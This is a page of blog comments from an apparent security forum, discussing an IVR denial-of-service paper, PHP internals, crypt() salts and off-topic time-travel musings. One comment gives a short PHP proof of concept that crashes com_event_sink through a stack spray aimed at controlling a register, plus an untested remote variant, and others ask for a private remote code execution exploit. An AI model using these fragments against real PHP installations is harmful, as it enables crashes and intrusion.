Blog Comments

  1. fb1h2s's Avatar
    @sean that was very helpful, will look into this and update sometime soon.

    Cheers
  2. sean's Avatar
    Hi Rahul,

    Really enjoyed your paper, "How I DOS'ed My Bank." My understanding of DTMF and DTMF decoding engines is very limited but I am interested in learning more about DTMF and IVR technologies. The idea of controlling software by transmitting sounds really appeals to my musical side!

    I read that it was possible to send binary data via DTMF signals (Dual-tone multi-frequency signaling - Wikipedia, the free encyclopedia) where each key on the touchpad would represent a nibble of data.

    For instance:
    (DTMF Signal)"5C 78 64 65" -> (Hex Representation)"\xDE"
    (DTMF Signal)"5C 78 41 64" -> (Hex Representation)"\xAD"
    (DTMF Signal)"5C 78 42 65" -> (Hex Representation)"\xBE"
    (DTMF Signal)"5C 78 65 66" -> (Hex Representation)"\xEF"

    Based on your research, does transmitting a stream of nibbles in the form of DTMF signals seem like a feasible avenue towards remote code execution on a vulnerable IVR system?

    -Sean
  3. amutu's Avatar
    congratz for the excellent post! I'm interested in php internals also! perhaps you can help me explaining some stuff 'cause i'm having some problems....i can't wait to read your php presentation from cocon!
    btw, you've managed to re-create the exploit for 5.3.9? or the RCE in 5.2? I'm working on that stuff...mostly 5.3.9


    ps: where can i download your paper from? can't find it on the cOcOn website.
    Updated 08-21-2012 at 05:56 PM by amutu
  4. fb1h2s's Avatar
    @[S] here I haven't provided the exploit yet right, all you have here is the Analysis . A
  5. [s]'s Avatar
    got ddosed on the following version !

    PHP 5.3.8 + Windows XP SP3 Professional PL
  6. fb1h2s's Avatar
    I tested it only on Win Xp sp2 . Others it would vary
  7. [s]'s Avatar
    Hi , its look good one
    In my case it is getting Ddosed ! Application getting crashed .. In my system stack is starting from 0x021F2351 and tried put some garbage on the stack so that ECX can be 0x41414141.
    Code:
    $EAX   = 0x021F2351;            
    $stack = str_repeat("x41", 0x1000000); 
     class w00t { }
    com_event_sink(new Variant($EAX), new w00t(), array());
    For remote i think this will work !
    Code:
    $ie->Visible = true; 
    $ie->Navigate($_post['anyvar']); 
    while(!$sink->terminated) { 
    com_message_pump(4000);
    PS:Remote is Not tested *
  8. 41.w4r10r's Avatar
    waiting for RCE blog....
    anyways you can PM me RCE sploit :P
  9. "vinnu"'s Avatar
    Namaste

    You switch off the light or pull out the wiring anyhow, it will also demagnetise the lock and open the door.

    A very informative writeup, thanx and keep on writting..."vinnu"
  10. H4x0rs's Avatar
    That would be amazing!!. I would have loved to go to an event like that and meet some famous black hats, etc. That would be like a dream come true. I just love to hear others stories on there adventure on going to such events. One day, hopefully I will get to attend the some. Congrats on your fun and your experience, all props to that!!
  11. fb1h2s's Avatar
    Hi amutu, it's not that it shouldn't be used, its just that its not that safe using it. Consider I got the hashes saved using crypt output , a 13 char hash. Now the first two chars are the hashes "2" (char hash). Its fairly easy with current computing power to crack a 2 char salted password .
  12. amutu's Avatar
    why crypt() should not be used? It's not clear to me......i understood about constant salts, but not about php's crypt function().
    Thanks,
  13. d4rkpyth0n's Avatar
    All went above the head.. Anyway its good to see that geeks study these things too..
  14. fb1h2s's Avatar
    Anarki bro, well my TM don't have the capability to go to the past , nor I believe it would be possible to travel to the past .

    @ [s] even though I dint get ur question, pallav and godwin were able to explain it to me [thank to them]. Well no I don't find a reason why metabolic rate would increase , and something like that would happen.
  15. AnArKI's Avatar
    @fb ...you are turning into a little Sheldon Cooper!!

    if I ever did perfect a time machine I'd go into the past and give it to myself. Thus eliminating the need for me to invent it in the first place-Sheldon (BBT)
  16. [s]'s Avatar
    @fb tell me if a human can be apparently sped up , the hibernation will increase , where the body temperature and metabolic rate of the creature is reduced. So possibility of dead rate will increase ..
  17. fb1h2s's Avatar
    @atul wow thhats some coool stuuf , life is like a live streaming 'foot ball' show on TV, just tht tv suscribers get it a little late. But if we could make something thta could stream datas a more faster , then we would be able to predict whts gone happen . Nice stuff .

    Have u guys had the feeling , that u were all of a sudden missing form the space were u were all of a sudden and get back having the feel that u were not present there for some amount of time. There are so many fascinating stuffs out threre .
  18. Aodrulez's Avatar
    Hi FB1H2S!

    thats some real science stuff n u juz reminded me of my school days when i was
    fascinated by all these things after reading 'COSMOS by Carl Sagan'.
    (Amazing book! recommended to everyone!)

    Now back to your theory... forget time travel... this thing named 'Time' itself is funny.
    For ex. ( from the above book )

    If you are standing, lets say 3 meters away from me. The irony of life is that I, am seeing
    how you 'were' & not exactly how you 'are' at that instant.

    Proof?
    Speed = Distance / Time.
    Therefore, Time = Distance / Speed.

    Here, Speed of light = 3x10^8 m/s.
    Distance= 3 m.
    Hence, if we substitute these values in the above equation,

    Time = 3 / (3x10^8) seconds.
    i.e Time = 1x10^-8 seconds.

    What does this mean? Well... when i see you, what exactly is happening is that
    Light rays.. bouncing off your body are hitting my eyes. And it takes 1x10^-8 seconds..
    when u are standing at a mere 3m distance from me. Amazing! When i see you... am actually
    seeing how you 'were' 10^-8 seconds earlier!

    So well technically.. every single individual/living organism... lives in the 'Past'. bwahaha!
    Lets say you look out of your window at night.. & see a star. chances are.. it doesnt exist anymore at all!
    What you are seeing is how it was..about a few or maybe few lakh light-years 'before'.

    Crazy realities is what i call these.
  19. Snypter's Avatar
    Dude what were You Drinking .. Organic Juice ??? I mean I feel like i am in a Limbo State at the moment ... Indeed thats intense Research ... But .. ERM sigh i dont know what to say ... ! Jr. Einstein on its way !
  20. fb1h2s's Avatar
    Nope not needed just $d ="functioname" ;
    $d(); // would be enough
Page 2 of 3 FirstFirst 123 LastLast